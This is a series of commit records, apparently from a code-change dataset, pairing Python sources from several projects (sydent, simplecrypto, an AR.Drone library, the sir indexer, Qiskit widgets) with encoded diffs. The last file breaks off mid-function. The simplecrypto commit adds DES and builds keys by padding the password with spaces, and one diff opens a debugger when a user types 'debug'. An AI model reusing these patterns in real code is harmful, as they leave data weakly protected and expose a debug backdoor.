            return self.page.get_absolute_url()
        elif self.url_name is not None:
            return reverse(self.url_name)
        else:
            return self.url

    class Meta:
        verbose_name_plural = _("menus")
        verbose_name = _("menu")
Python
0
@@ -2745,16 +2745,17 @@ elf.slug +, ))%0A
53055e47d14fd5905673941aa45ef9fe383eb885
Version for pypi.
inovonics/cloud/oauth/__version__.py
inovonics/cloud/oauth/__version__.py
#!/usr/bin/env python3
__version__ = '0.1.0.7'
Python
0
@@ -41,7 +41,7 @@ 1.0. -7 +8 '%0A
e6885fd2260dc9399f5ea2f835cbf65294d18a8d
make competiable with postgres new version 8.3
addons/report_analytic_line/report_analytic_line.py
addons/report_analytic_line/report_analytic_line.py
##############################################################################
#
# Copyright (c) 2004-2006 TINY SPRL. (http://tiny.be) All Rights Reserved.
#
# $Id: sale.py 1005 2005-07-25 08:41:42Z nicoe $
#
# WARNING: This program as such is intended to be used by professional
# programmers who take the whole responsability of assessing all potential
# consequences resulting from its eventual inadequacies and bugs
# End users who are looking for a ready-to-use solution with commercial
# garantees and support are strongly adviced to contract a Free Software
# Service Company
#
# This program is Free Software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License
# as published by the Free Software Foundation; either version 2
# of the License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA.
#
##############################################################################

from osv import fields,osv


class report_account_analytic_line_to_invoice(osv.osv):
    _name = "report.account.analytic.line.to.invoice"
    _description = "Analytic lines to invoice report"
    _auto = False
    _columns = {
        'name': fields.date('Month', readonly=True),
        'product_id':fields.many2one('product.product', 'Product', readonly=True),
        'account_id':fields.many2one('account.analytic.account', 'Analytic account', readonly=True),
        'product_uom_id':fields.many2one('product.uom', 'UoM', readonly=True),
        'unit_amount': fields.float('Units', readonly=True),
        'sale_price': fields.float('Sale price', readonly=True),
        'amount': fields.float('Amount', readonly=True),
    }
    _order = 'name desc, product_id asc, account_id asc'

    def init(self, cr):
        cr.execute("""
            CREATE OR REPLACE VIEW report_account_analytic_line_to_invoice AS (
                SELECT
                    DISTINCT(SUBSTRING(l.date for 7))||'-'||'01' AS name,
                    MIN(l.id) AS id,
                    l.product_id,
                    l.account_id,
                    SUM(l.amount) AS amount,
                    SUM(l.unit_amount*t.list_price) AS sale_price,
                    SUM(l.unit_amount) AS unit_amount,
                    l.product_uom_id
                FROM account_analytic_line l
                    left join product_product p on (l.product_id=p.id)
                    left join product_template t on (p.product_tmpl_id=t.id)
                WHERE (invoice_id IS NULL) and (to_invoice IS NOT NULL)
                GROUP BY SUBSTRING(date for 7), product_id, product_uom_id, account_id
            )
        """)

report_account_analytic_line_to_invoice()
Python
0
@@ -2335,43 +2335,37 @@ NCT( -SUBSTRING(l.date for 7))%7C%7C'-'%7C%7C'01' +to_char(l.date,'YYYY-MM-DD')) AS @@ -3065,28 +3065,33 @@ -SUBSTRING(date for 7 +to_char(date,'YYYY-MM-DD' ), p
5d36e7d939b89a59dcb68002c244ac6684cb94c4
Fix access to assoc params
sydent/threepid/bind.py
sydent/threepid/bind.py
# -*- coding: utf-8 -*-

# Copyright 2014 OpenMarket Ltd
# Copyright 2018 New Vector Ltd
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
#     http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.

import collections
import json
import logging
import math
import random

import signedjson.sign

from sydent.db.invite_tokens import JoinTokenStore
from sydent.db.threepid_associations import LocalAssociationStore

from sydent.util import time_msec
from sydent.threepid.signer import Signer
from sydent.http.httpclient import FederationHttpClient

from sydent.threepid import ThreepidAssociation

from OpenSSL import SSL
from OpenSSL.SSL import VERIFY_NONE

from StringIO import StringIO

from twisted.internet import reactor, defer, ssl
from twisted.names import client, dns
from twisted.names.error import DNSNameError
from twisted.web.client import FileBodyProducer, Agent
from twisted.web.http_headers import Headers

logger = logging.getLogger(__name__)


class ThreepidBinder:
    # the lifetime of a 3pid association
    THREEPID_ASSOCIATION_LIFETIME_MS = 100 * 365 * 24 * 60 * 60 * 1000

    def __init__(self, sydent):
        self.sydent = sydent

    def addBinding(self, medium, address, mxid):
        """Binds the given 3pid to the given mxid.

        It's assumed that we have somehow validated that the given user owns
        the given 3pid

        Args:
            medium (str): the type of 3pid
            address (str): the 3pid
            mxid (str): the mxid to bind it to
        """
        localAssocStore = LocalAssociationStore(self.sydent)

        createdAt = time_msec()
        expires = createdAt + ThreepidBinder.THREEPID_ASSOCIATION_LIFETIME_MS

        assoc = ThreepidAssociation(medium, address, mxid, createdAt, createdAt, expires)

        localAssocStore.addOrUpdateAssociation(assoc)

        self.sydent.pusher.doLocalPush()

        joinTokenStore = JoinTokenStore(self.sydent)
        pendingJoinTokens = joinTokenStore.getTokens(medium, address)
        invites = []
        for token in pendingJoinTokens:
            token["mxid"] = mxid
            token["signed"] = {
                "mxid": mxid,
                "token": token["token"],
            }
            token["signed"] = signedjson.sign.sign_json(token["signed"], self.sydent.server_name, self.sydent.keyring.ed25519)
            invites.append(token)
        if invites:
            assoc.extra_fields["invites"] = invites
            joinTokenStore.markTokensAsSent(medium, address)

        signer = Signer(self.sydent)
        sgassoc = signer.signedThreePidAssociation(assoc)

        self._notify(sgassoc, 0)

        return sgassoc

    def removeBinding(self, threepid, mxid):
        localAssocStore = LocalAssociationStore(self.sydent)
        localAssocStore.removeAssociation(threepid, mxid)
        self.sydent.pusher.doLocalPush()

    @defer.inlineCallbacks
    def _notify(self, assoc, attempt):
        mxid = assoc["mxid"]
        domain = mxid.split(":")[-1]
        server = yield self._pickServer(domain)

        post_url = "https://%s/_matrix/federation/v1/3pid/onbind" % (
            server,
        )

        logger.info("Making bind callback to: %s", post_url)

        # Make a POST to the chosen Synapse server
        http_client = FederationHttpClient(self.sydent)
        try:
            response = yield http_client.post_json_get_nothing(post_url, assoc, {})
        except Exception as e:
            self._notifyErrback(assoc, attempt, e)
            return

        # If the request failed, try again with exponential backoff
        if response.code != 200:
            self._notifyErrback(
                assoc, attempt, "Non-OK error code received (%d)" % response.code
            )
        else:
            logger.info("Successfully notified on bind for %s" % (mxid,))

            # Only remove sent tokens when they've been successfully sent.
            if assoc.extra_fields["invite"]:
                try:
                    joinTokenStore = JoinTokenStore(self.sydent)
                    joinTokenStore.deleteTokens(assoc.medium, assoc.address)
                except Exception as e:
                    logger.error(
                        "Couldn't remove invite for % from the store: %s",
                        mxid, e,
                    )


    def _notifyErrback(self, assoc, attempt, error):
        logger.warn("Error notifying on bind for %s: %s - rescheduling", assoc["mxid"], error)
        reactor.callLater(math.pow(2, attempt), self._notify, assoc, attempt + 1)

    # The below is lovingly ripped off of synapse/http/endpoint.py

    _Server = collections.namedtuple("_Server", "priority weight host port")

    @defer.inlineCallbacks
    def _pickServer(self, host):
        servers = yield self._fetchServers(host)
        if not servers:
            defer.returnValue("%s:8448" % (host,))

        min_priority = servers[0].priority
        weight_indexes = list(
            (index, server.weight + 1)
            for index, server in enumerate(servers)
            if server.priority == min_priority
        )

        total_weight = sum(weight for index, weight in weight_indexes)
        target_weight = random.randint(0, total_weight)

        for index, weight in weight_indexes:
            target_weight -= weight

            if target_weight <= 0:
                server = servers[index]
                defer.returnValue("%s:%d" % (server.host, server.port,))
                return

    @defer.inlineCallbacks
    def _fetchServers(self, host):
        try:
            service = "_matrix._tcp.%s" % host
            answers, auth, add = yield client.lookupService(service)
        except DNSNameError:
            answers = []

        if (len(answers) == 1
                and answers[0].type == dns.SRV
                and answers[0].payload
                and answers[0].payload.target == dns.Name(".")):
            raise DNSNameError("Service %s unavailable", service)

        servers = []

        for answer in answers:
            if answer.type != dns.SRV or not answer.payload:
                continue
            payload = answer.payload
            servers.append(ThreepidBinder._Server(
                host=str(payload.target),
                port=int(payload.port),
                priority=int(payload.priority),
                weight=int(payload.weight)
            ))

        servers.sort()

        defer.returnValue(servers)
Python
0
@@ -4355,30 +4355,22 @@ soc. -extra_fields%5B +get( %22invite -%22%5D +s%22) :%0A @@ -4510,30 +4510,36 @@ ssoc -. +%5B%22 medium +%22%5D , assoc -. +%5B%22 address +%22%5D )%0A @@ -4693,16 +4693,16 @@ xid, e,%0A + @@ -4716,17 +4716,16 @@ )%0A%0A -%0A def
602aa1ecdf74847b27d6cce0d91e8d2be721671d
clean up a bit of the at commands with newer conventions and more complete commands
ardrone/at.py
ardrone/at.py
import socket
import struct

import ardrone.constant

def f2i(f):
    """Interpret IEEE-754 floating-point value as signed integer.

    Arguments:
    f -- floating point value
    """
    return struct.unpack('i', struct.pack('f', f))[0]

def ref(host, seq, takeoff, emergency=False):
    """
    Basic behaviour of the drone: take-off/landing, emergency stop/reset)

    Parameters:
    seq -- sequence number
    takeoff -- True: Takeoff / False: Land
    emergency -- True: Turn off the engines
    """
    p = 0b10001010101000000000000000000
    if takeoff:
        p += 0b1000000000
    if emergency:
        p += 0b0100000000
    at(host, 'REF', seq, [p])

def pcmd(host, seq, progressive, lr, fb, vv, va):
    """
    Makes the drone move (translate/rotate).

    Parameters:
    seq -- sequence number
    progressive -- True: enable progressive commands, False: disable (i.e.
        enable hovering mode)
    lr -- left-right tilt: float [-1..1] negative: left, positive: right
    rb -- front-back tilt: float [-1..1] negative: forwards, positive:
        backwards
    vv -- vertical speed: float [-1..1] negative: go down, positive: rise
    va -- angular speed: float [-1..1] negative: spin left, positive: spin
        right

    The above float values are a percentage of the maximum speed.
    """
    p = 1 if progressive else 0
    at(host, 'PCMD', seq, [p, float(lr), float(fb), float(vv), float(va)])

def ftrim(host, seq):
    """
    Tell the drone it's lying horizontally.

    Parameters:
    seq -- sequence number
    """
    at(host, 'FTRIM', seq, [])

def zap(host, seq, stream):
    """
    Selects which video stream to send on the video UDP port.

    Parameters:
    seq -- sequence number
    stream -- Integer: video stream to broadcast
    """
    # FIXME: improve parameters to select the modes directly
    at(host, 'ZAP', seq, [stream])

def config(host, seq, option, value):
    """Set configuration parameters of the drone."""
    at(host, 'CONFIG', seq, [str(option), str(value)])

def comwdg(host, seq):
    """
    Reset communication watchdog.
    """
    # FIXME: no sequence number
    at(host, 'COMWDG', seq, [])

def aflight(host, seq, flag):
    """
    Makes the drone fly autonomously.

    Parameters:
    seq -- sequence number
    flag -- Integer: 1: start flight, 0: stop flight
    """
    at(host, 'AFLIGHT', seq, [flag])

def pwm(host, seq, m1, m2, m3, m4):
    """
    Sends control values directly to the engines, overriding control loops.

    Parameters:
    seq -- sequence number
    m1 -- front left command
    m2 -- fright right command
    m3 -- back right command
    m4 -- back left command
    """
    # FIXME: what type do mx have?
    pass

def led(host, seq, anim, f, d):
    """
    Control the drones LED.

    Parameters:
    seq -- sequence number
    anim -- Integer: animation to play
    f -- ?: frequence in HZ of the animation
    d -- Integer: total duration in seconds of the animation
    """
    pass

def anim(host, seq, anim, d):
    """
    Makes the drone execute a predefined movement (animation).

    Parameters:
    seq -- sequence number
    anim -- Integer: animation to play
    d -- Integer: total duration in sections of the animation
    """
    at(host, 'ANIM', seq, [anim, d])

def at(host, command, seq, params):
    """
    Parameters:
    command -- the command
    seq -- the sequence number
    params -- a list of elements which can be either int, float or string
    """
    param_str = ''
    for p in params:
        if type(p) == int:
            param_str += ',%d' % p
        elif type(p) == float:
            param_str += ',%d' % f2i(p)
        elif type(p) == str:
            param_str += ',"'+p+'"'
    msg = 'AT*%s=%i%s\r' % (command, seq, param_str)
    sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    sock.sendto(msg.encode(), (host, ardrone.constant.COMMAND_PORT))
Python
0.000001
@@ -563,25 +563,25 @@ :%0A p -+ +%7C = 0b10000000 @@ -611,17 +611,17 @@ p -+ +%7C = 0b0100 @@ -2549,16 +2549,25 @@ m1 -- + Integer: front l @@ -2592,13 +2592,21 @@ -- -frigh +Integer: fron t ri @@ -2626,16 +2626,25 @@ m3 -- + Integer: back ri @@ -2664,16 +2664,25 @@ m4 -- + Integer: back le @@ -2708,47 +2708,46 @@ -# FIXME: what type do mx have?%0A pass +at(host, 'PWM', seq, %5Bm1, m2, m3, m4%5D) %0A%0Ade @@ -2908,9 +2908,13 @@ -- -? +Float : fr @@ -2919,17 +2919,17 @@ frequenc -e +y in HZ o @@ -3021,12 +3021,49 @@ -pass +at(host, 'LED', seq, %5Banim, float(f), d%5D) %0A%0Ade @@ -3284,20 +3284,19 @@ n in sec -ti on +d s of the @@ -3565,17 +3565,18 @@ aram +s _str = -'' +%5B%5D %0A @@ -3641,25 +3641,38 @@ aram +s _str - += ',%25d' %25 p +.append('%7B:d%7D'.format(p)) %0A @@ -3720,30 +3720,43 @@ aram +s _str - += ',%25d' %25 +.append('%7B:d%7D'.format( f2i(p) +)) %0A @@ -3802,54 +3802,79 @@ aram +s _str - += ',%22'+p+'%22'%0A msg = 'AT*%25s=%25i%25s%5Cr' %25 +.append('%22%7B:s%7D%22'.format(p))%0A msg = 'AT*%7B:s%7D=%7B:d%7D,%7B:s%7D%5Cr'.format (com @@ -3880,24 +3880,33 @@ mmand, seq, +','.join( param_str)%0A @@ -3903,16 +3903,17 @@ ram_str) +) %0A soc
9069c2678b68571406458f7414c7b0474183090b
Fix check for dictionary entry
lit/Suite/lldbtest.py
lit/Suite/lldbtest.py
from __future__ import absolute_import

import os
import subprocess
import sys

import lit.Test
import lit.TestRunner
import lit.util
from lit.formats.base import TestFormat


def getBuildDir(cmd):
    found = False
    for arg in cmd:
        if found:
            return arg
        if arg == '--build-dir':
            found = True
    return None


class LLDBTest(TestFormat):
    def __init__(self, dotest_cmd):
        self.dotest_cmd = dotest_cmd

    def getTestsInDirectory(self, testSuite, path_in_suite, litConfig,
                            localConfig):
        source_path = testSuite.getSourcePath(path_in_suite)
        for filename in os.listdir(source_path):
            # Ignore dot files and excluded tests.
            if (filename.startswith('.') or
                    filename in localConfig.excludes):
                continue

            # Ignore files that don't start with 'Test'.
            if not filename.startswith('Test'):
                continue

            filepath = os.path.join(source_path, filename)
            if not os.path.isdir(filepath):
                base, ext = os.path.splitext(filename)
                if ext in localConfig.suffixes:
                    yield lit.Test.Test(testSuite,
                                        path_in_suite + (filename, ),
                                        localConfig)

    def execute(self, test, litConfig):
        if litConfig.noExecute:
            return lit.Test.PASS, ''

        if test.config.lldb_disable_python:
            return (lit.Test.UNSUPPORTED, 'Python module disabled')

        if test.config.unsupported:
            return (lit.Test.UNSUPPORTED, 'Test is unsupported')

        testPath, testFile = os.path.split(test.getSourcePath())
        # On Windows, the system does not always correctly interpret
        # shebang lines.  To make sure we can execute the tests, add
        # python exe as the first parameter of the command.
        cmd = [sys.executable] + self.dotest_cmd + [testPath, '-p', testFile]

        # The macOS system integrity protection (SIP) doesn't allow injecting
        # libraries into system binaries, but this can be worked around by
        # copying the binary into a different location.
        if test.config.environment['DYLD_INSERT_LIBRARIES'] and \
                sys.executable.startswith('/System/'):
            builddir = getBuildDir(cmd)
            assert(builddir)
            copied_python = os.path.join(builddir, 'copied-system-python')
            import shutil
            shutil.copy(sys.executable, os.path.join(builddir, copied_python))
            cmd[0] = copied_python

        try:
            out, err, exitCode = lit.util.executeCommand(
                cmd,
                env=test.config.environment,
                timeout=litConfig.maxIndividualTestTime)
        except lit.util.ExecuteCommandTimeoutException:
            return (lit.Test.TIMEOUT, 'Reached timeout of {} seconds'.format(
                litConfig.maxIndividualTestTime))

        if exitCode:
            return lit.Test.FAIL, out + err

        passing_test_line = 'RESULT: PASSED'
        if passing_test_line not in out and passing_test_line not in err:
            msg = ('Unable to find %r in dotest output:\n\n%s%s' %
                   (passing_test_line, out, err))
            return lit.Test.UNRESOLVED, msg

        return lit.Test.PASS, ''
Python
0
@@ -2188,56 +2188,58 @@ if -test.config.environment%5B'DYLD_INSERT_LIBRARIES'%5D +'DYLD_INSERT_LIBRARIES' in test.config.environment and
f27dc9d2793bb555d80a5c8e6635ba246278d017
Add DES support
simplecrypto.py
simplecrypto.py
import hashlib
import math
import base64

from Crypto.Cipher import DES, AES
from Crypto import Random

random_instance = Random.new()
algorithms = {'aes': AES, 'des': DES}

def sha1(message):
    return hashlib.sha1(message).hexdigest()

def md5(message):
    return hashlib.md5(message).hexdigest()

def sha256(message):
    return hashlib.sha256(message).hexdigest()

def sha512(message):
    return hashlib.sha512(message).hexdigest()

def str_to_base64(message):
    return base64.b64encode(message)

def base64_to_str(message):
    return base64.b64decode(message)

def pad(message, length, padding=' '):
    return message + (length - len(message)) * padding

def pad_multiple(message, len_multiple, padding=' '):
    next_length = math.ceil(len(message) / float(len_multiple)) * len_multiple
    return pad(message, int(next_length), padding)

def random(n_bytes):
    return random_instance.read(n_bytes)

def encrypt(message, password, algorithm='aes'):
    cls = algorithms[algorithm]
    iv = random(cls.block_size)
    instance = cls.new(pad_multiple(password, 16), cls.MODE_CFB, iv)
    return str_to_base64(iv + instance.encrypt(message))

def decrypt(message, password, algorithm='aes'):
    message = base64_to_str(message)
    iv, message = message[:AES.block_size], message[AES.block_size:]
    instance = AES.new(pad_multiple(password, 16), AES.MODE_CFB, iv)
    return instance.decrypt(message)

def encrypt_aes(message, password):
    return encrypt(message, password, 'aes')

def decrypt_aes(message, password):
    return decrypt(message, password, 'aes')
Python
0
@@ -24,21 +24,47 @@ ath%0A -import base64 +from base64 import b64encode, b64decode %0Afro @@ -498,23 +498,16 @@ return -base64. b64encod @@ -561,15 +561,8 @@ urn -base64. b64d @@ -573,24 +573,48 @@ e(message)%0A%0A +base64 = str_to_base64%0A%0A def pad(mess @@ -1681,28 +1681,192 @@ t(message, password, 'aes')%0A +%0Adef encrypt_des(message, password):%0A return encrypt(message, password, 'des')%0A%0Adef decrypt_des(message, password):%0A return decrypt(message, password, 'des')%0A
1bd814df2c5175ac7745b2d58fbe6b82c5a941ae
add 'debug' hack
sts/util/console.py
sts/util/console.py
BEGIN = '\033[1;'
END = '\033[1;m'

class color(object):
  GRAY, RED, GREEN, YELLOW, BLUE, MAGENTA, CYAN, WHITE, CRIMSON = map(lambda num : BEGIN + str(num) + "m", range(30, 39))
  B_GRAY, B_RED, B_GREEN, B_YELLOW, B_BLUE, B_MAGENTA, B_CYAN, B_WHITE, B_CRIMSON = map(lambda num: BEGIN + str(num) + "m", range(40, 49))
  NORMAL = END

class msg():
  global_io_master = None

  BEGIN = '\033[1;'
  END = '\033[1;m'

  GRAY, RED, GREEN, YELLOW, BLUE, MAGENTA, CYAN, WHITE, CRIMSON = map(lambda num: str(num) + "m", range(30, 39))
  B_GRAY, B_RED, B_GREEN, B_YELLOW, B_BLUE, B_MAGENTA, B_CYAN, B_WHITE, B_CRIMSON = map(lambda num: str(num) + "m", range(40, 49))

  @staticmethod
  def interactive(message):
    # todo: would be nice to simply give logger a color arg, but that doesn't exist...
    print msg.BEGIN + msg.WHITE + message + msg.END

  @staticmethod
  def event(message):
    print msg.BEGIN + msg.CYAN + message + msg.END

  @staticmethod
  def raw_input(message):
    prompt = msg.BEGIN + msg.WHITE + message + msg.END
    if msg.global_io_master:
      return msg.global_io_master.raw_input(prompt)
    else:
      return raw_input(prompt)

  @staticmethod
  def success(message):
    print msg.BEGIN + msg.B_GREEN + msg.BEGIN + msg.WHITE + message + msg.END

  @staticmethod
  def fail(message):
    print msg.BEGIN + msg.B_RED + msg.BEGIN + msg.WHITE + message + msg.END

  @staticmethod
  def set_io_master(io_master):
    msg.global_io_master = io_master

  @staticmethod
  def unset_io_master():
    msg.global_io_master = None
Python
0.000001
@@ -1060,22 +1060,19 @@ :%0A -return +s = msg.glo @@ -1123,14 +1123,11 @@ -return +s = raw @@ -1142,16 +1142,90 @@ rompt)%0A%0A + if s == %22debug%22:%0A import pdb%0A pdb.set_trace()%0A return s%0A%0A @stati
4987412578744db64984cb40841994b3852287f7
update evalrunner
pytools/src/IndexEval/evalrunner.py
pytools/src/IndexEval/evalrunner.py
'''
Created on 04.11.2015

@author: selen00r
'''
import datetime

from pymongo.mongo_client import MongoClient

import evalresult


class EvalRunner(object):
    '''
    Base class to run an evaluation of an index.
    '''

    def __init__(self):
        '''
        Constructor
        '''
        self.dbName = "indexdb"
        self.idxDax = "dax"
        self.idxMDax = "mdax"
        self.idxTecDax = "tecdax"
        self.idxSP500 = "sp500"
        self.idxNasdaq100 = "nasdaq100"
        self.idxEStoxx50 = "estoxx50"
        self.idxNikkei = "nikkei"
        self.idxSMI = "smi"
        self.idxATX = "atx"
        self.idxCAC = "cac"
        self.idxDowJones = "dowjones"
        self.idxFTS100 = "fts100"
        self.idxFtseMib = "ftsemib"
        self.idxHangSeng = "hangseng"
        self.idxIbex = "ibex"

        self.allIndices = [self.idxATX,
                           self.idxCAC,
                           self.idxDax,
                           self.idxDowJones,
                           self.idxEStoxx50,
                           self.idxFTS100,
                           self.idxFtseMib,
                           self.idxHangSeng,
                           self.idxIbex,
                           self.idxMDax,
                           self.idxNasdaq100,
                           self.idxNikkei,
                           self.idxSMI,
                           self.idxTecDax]

    def setUp(self):
        self.mongoClient = MongoClient()
        self.database = self.mongoClient[self.dbName]

        self.startDate = datetime.datetime( 2000, 1, 1 )
        self.endDate = datetime.datetime( 2015, 10, 1 )

        self.startInvest = 1000.0
        self.fixedInvest = True

        self.excludeChecker = evalresult.ExcludeTransaction()
        self.resultCalculator = evalresult.ResultCalculator()
        self.resultCalculatorEuro = evalresult.ResultCalculatorEuro(self.startInvest, self.fixedInvest)

    def tearDown(self):
        pass
Python
0
@@ -359,19 +359,19 @@ self.idx -Dax +ATX @@ -374,18 +374,18 @@ = %22 -d a +t x%22%0D%0A @@ -396,20 +396,20 @@ self.idx -MDax +CAC @@ -415,12 +415,11 @@ = %22 -mdax +cac %22%0D%0A @@ -433,22 +433,22 @@ self.idx -Tec Dax + = @@ -452,11 +452,8 @@ = %22 -tec dax%22 @@ -474,112 +474,113 @@ .idx -SP500 = %22sp500%22%0D%0A self.idxNasdaq100 = %22nasdaq100%22%0D%0A self.idxEStoxx50 = %22estoxx5 +DowJones = %22dowjones%22%0D%0A self.idxEStoxx50 = %22estoxx50%22%0D%0A self.idxFTS100 = %22ftse10 0%22%0D%0A @@ -599,29 +599,30 @@ .idx -Nikkei +FtseMib - = %22 -nikkei +ftsemib %22%0D%0A @@ -640,26 +640,31 @@ .idx -SMI = %22smi +HangSeng = %22hangseng %22%0D%0A @@ -670,36 +670,36 @@ self.idx -ATX +Ibex = %22atx%22%0D @@ -685,34 +685,35 @@ xIbex = %22 -at +ibe x%22%0D%0A self @@ -708,36 +708,36 @@ self.idx -CAC +MDax = %22cac%22%0D @@ -723,35 +723,36 @@ xMDax = %22 -cac +mdax %22%0D%0A self. @@ -754,39 +754,40 @@ self.idx -DowJones = %22dowjones +Nasdaq100 = %22nasdaq100 %22%0D%0A @@ -789,38 +789,38 @@ self.idx -FTS100 +Nikkei = %22fts100%22 @@ -816,14 +816,14 @@ = %22 -fts100 +nikkei %22%0D%0A @@ -837,38 +837,34 @@ self.idx -FtseMib +SMI + = %22 -ftse +s mi -b %22%0D%0A @@ -874,39 +874,36 @@ self.idx -HangSeng +SP500 + = %22 -hangseng +sp500 %22%0D%0A @@ -913,34 +913,36 @@ self.idx -Ibe +TecDa x - = %22 -ibe +tecda x%22%0D%0A%0D%0A @@ -1469,17 +1469,17 @@ 2015, 1 -0 +2 , 1 )%0D%0A%0D @@ -1819,8 +1819,12 @@ pass +%0D%0A%0D%0A
5ba73b9dd92b55b3f02f76ae981e53744abac750
Add an option to time SQL statements
sir/__main__.py
sir/__main__.py
# Copyright (c) 2014 Wieland Hoffmann # License: MIT, see LICENSE for details import argparse import logging import multiprocessing from . import config from .indexing import reindex from .schema import SCHEMA from sqlalchemy import exc as sa_exc logger = logging.getLogger("sir") def watch(args): raise NotImplementedError def main(): loghandler = logging.StreamHandler() formatter = logging.Formatter(fmt="%(processName)s %(asctime)s %(levelname)s: %(message)s") loghandler.setFormatter(formatter) logger.addHandler(loghandler) mplogger = multiprocessing.get_logger() mplogger.setLevel(logging.ERROR) mplogger.addHandler(loghandler) parser = argparse.ArgumentParser() parser.add_argument("-d", "--debug", action="store_true") subparsers = parser.add_subparsers() reindex_parser = subparsers.add_parser("reindex", help="Reindexes all or a single entity type") reindex_parser.set_defaults(func=reindex) reindex_parser.add_argument('--entities', action='append', help="""Which entity types to index. Available are: %s""" % (", ".join(SCHEMA.keys()))) watch_parser = subparsers.add_parser("watch", help="Watches for incoming messages on an AMQP queue") watch_parser.set_defaults(func=watch) args = parser.parse_args() if args.debug: logging.getLogger("sqlalchemy.engine").setLevel(logging.DEBUG) logger.setLevel(logging.DEBUG) else: logger.setLevel(logging.INFO) config.read_config() func = args.func args = vars(args) func(args["entities"]) if __name__ == '__main__': main()
Python
0.000014
@@ -768,24 +768,85 @@ tore_true%22)%0A + parser.add_argument(%22--sqltimings%22, action=%22store_true%22)%0A subparse @@ -1392,79 +1392,8 @@ ug:%0A - logging.getLogger(%22sqlalchemy.engine%22).setLevel(logging.DEBUG)%0A @@ -1475,16 +1475,986 @@ g.INFO)%0A +%0A if args.sqltimings:%0A from sqlalchemy import event%0A from sqlalchemy.engine import Engine%0A import time%0A%0A sqltimelogger = logging.getLogger(%22sqltimer%22)%0A sqltimelogger.setLevel(logging.DEBUG)%0A sqltimelogger.addHandler(loghandler)%0A%0A @event.listens_for(Engine, %22before_cursor_execute%22)%0A def before_cursor_execute(conn, cursor, statement,%0A parameters, context, executemany):%0A conn.info.setdefault('query_start_time', %5B%5D).append(time.time())%0A sqltimelogger.debug(%22Start Query: %25s%22 %25 statement)%0A%0A @event.listens_for(Engine, %22after_cursor_execute%22)%0A def after_cursor_execute(conn, cursor, statement,%0A parameters, context, executemany):%0A total = time.time() - conn.info%5B'query_start_time'%5D.pop(-1)%0A sqltimelogger.debug(%22Query Complete!%22)%0A sqltimelogger.debug(%22Total Time: %25f%22 %25 total)%0A%0A conf
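The new --sqltimings flag installs a pair of engine hooks instead of turning on sqlalchemy.engine's DEBUG logging wholesale. before_cursor_execute and after_cursor_execute are real SQLAlchemy events, and stashing a start time on conn.info is the stock timing recipe; the diff's hooks, lifted into a standalone sketch:

import logging
import time

from sqlalchemy import event
from sqlalchemy.engine import Engine

sqltimelogger = logging.getLogger("sqltimer")

@event.listens_for(Engine, "before_cursor_execute")
def before_cursor_execute(conn, cursor, statement,
                          parameters, context, executemany):
    # push, don't overwrite: nested or overlapping executes each get a slot
    conn.info.setdefault('query_start_time', []).append(time.time())
    sqltimelogger.debug("Start Query: %s", statement)

@event.listens_for(Engine, "after_cursor_execute")
def after_cursor_execute(conn, cursor, statement,
                         parameters, context, executemany):
    total = time.time() - conn.info['query_start_time'].pop(-1)
    sqltimelogger.debug("Total Time: %f", total)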
dde133a9ae751ce3caab8e8896c1e04e48c0cc1e
fix typo
qiita_pet/handlers/base_handlers.py
qiita_pet/handlers/base_handlers.py
from tornado.web import RequestHandler class BaseHandler(RequestHandler): def get_current_user(self): '''Overrides default method of returning user curently connected''' user = self.get_secure_cookie("user") if user is None: self.clear_cookie("user") return None else: return user.strip('" ') def write_error(self, status_code, **kwargs): '''Overrides the error page created by Tornado''' from traceback import format_exception if self.settings.get("debug") and "exc_info" in kwargs: exc_info = kwargs["exc_info"] trace_info = ''.join(["%s<br />" % line for line in format_exception(*exc_info)]) request_info = ''.join(["<strong>%s</strong>: %s<br />" % (k, self.request.__dict__[k]) for k in self.request.__dict__.keys()]) error = exc_info[1] self.render('error.html', error=error, trace_info=trace_info, request_info=request_info, user=self.current_user) def head(self): """Adds proper resonse for head requests""" self.finish() class MainHandler(BaseHandler): '''Index page''' def get(self): username = self.current_user completedanalyses = [] self.render("index.html", user=username, analyses=completedanalyses) class MockupHandler(BaseHandler): def get(self): self.render("mockup.html", user=self.current_user) class NoPageHandler(BaseHandler): def get(self): self.render("404.html", user=self.current_user)
Python
0.999991
@@ -1214,16 +1214,17 @@ oper res +p onse for
2850768bcc18dd8628211ad72af4c9de5df13ad9
Increase job watcher cancel button width. (#3708)
qiskit/tools/jupyter/job_widgets.py
qiskit/tools/jupyter/job_widgets.py
# -*- coding: utf-8 -*- # This code is part of Qiskit. # # (C) Copyright IBM 2017, 2019. # # This code is licensed under the Apache License, Version 2.0. You may # obtain a copy of this license in the LICENSE.txt file in the root directory # of this source tree or at http://www.apache.org/licenses/LICENSE-2.0. # # Any modifications or derivative works of this code must retain this # copyright notice, and modified files need to carry a notice indicating # that they have been altered from the originals. """A module of widgets for job tracking""" import ipywidgets as widgets from IPython.display import display, Javascript def make_clear_button(watcher): """Makes the clear button Args: watcher (widget): The watcher widget instance. Returns: widget: The clear button widget. """ clear = widgets.Button( description='Clear', button_style='primary', layout=widgets.Layout(width='70px', grid_area='right', padding="0px 0px 0px 0px")) def on_clear_button_clicked(_): watcher.clear_done() clear.on_click(on_clear_button_clicked) clear_button = widgets.GridBox(children=[clear], layout=widgets.Layout( width='100%', grid_template_columns='20% 20% 20% 20% 20%', grid_template_areas=''' ". . . . right " ''')) return clear_button def make_labels(): """Makes the labels widget. Returns: widget: The labels widget. """ labels0 = widgets.HTML(value="<h5>Job ID</h5>", layout=widgets.Layout(width='190px')) labels1 = widgets.HTML(value='<h5>Backend</h5>', layout=widgets.Layout(width='145px')) labels2 = widgets.HTML(value='<h5>Status</h5>', layout=widgets.Layout(width='95px')) labels3 = widgets.HTML(value='<h5>Queue</h5>', layout=widgets.Layout(width='70px')) 